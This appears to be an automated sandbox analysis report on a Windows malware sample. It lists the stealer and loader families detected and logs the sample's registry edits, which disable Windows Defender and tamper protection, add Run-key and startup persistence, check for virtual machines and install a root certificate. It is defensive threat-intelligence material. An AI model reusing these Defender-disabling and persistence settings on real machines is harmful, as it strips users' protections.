Analysis Overview
SHA256
d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e
Threat Level: Known bad
The file d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e was found to be: Known bad.
Malicious Activity Summary
Detects Healer, an antivirus disabler dropper
Detect Vidar Stealer
Modifies Windows Defender DisableAntiSpyware settings
Litehttp family
Xworm family
Amadey
Detect Xworm Payload
Healer family
Modifies Windows Defender notification settings
Stealc family
Modifies Windows Defender Real-time Protection settings
Healer
SystemBC
Systembc family
Xworm
LiteHTTP
Amadey family
Modifies Windows Defender TamperProtection settings
Vidar family
Vidar
Stealc
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Uses browser remote debugging
Executes dropped EXE
Checks BIOS information in registry
Reads data files stored by FTP clients
.NET Reactor protector
Checks computer location settings
Unsecured Credentials: Credentials In Files
Reads user/profile data of web browsers
Identifies Wine through registry keys
Loads dropped DLL
Reads user/profile data of local email clients
Drops startup file
Windows security modification
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates processes with tasklist
Suspicious use of SetThreadContext
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Browser Information Discovery
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Program crash
Unsigned PE
Modifies registry class
Scheduled Task/Job: Scheduled Task
Checks processor information in registry
Suspicious use of SendNotifyMessage
Delays execution with timeout.exe
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Kills process with taskkill
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Modifies data under HKEY_USERS
Suspicious use of FindShellTrayWindow
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-05 22:28
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-05 22:28
Reported
2025-03-05 22:30
Platform
win7-20240903-en
Max time kernel
146s
Max time network
151s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer, an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Healer
Healer family
LiteHTTP
Litehttp family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
Stealc
Stealc family
SystemBC
Systembc family
Vidar
Vidar family
Xworm
Xworm family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
.NET Reactor protector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\69c80032ec.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107380101\\69c80032ec.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\63f1932a62.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107390101\\63f1932a62.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\8e275fbb94.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107400101\\8e275fbb94.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\8QpbZ8u9\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\460d9c14c9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107370101\\460d9c14c9.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates processes with tasklist
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2752 set thread context of 2608 | N/A | C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe |
| PID 2052 set thread context of 2044 | N/A | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
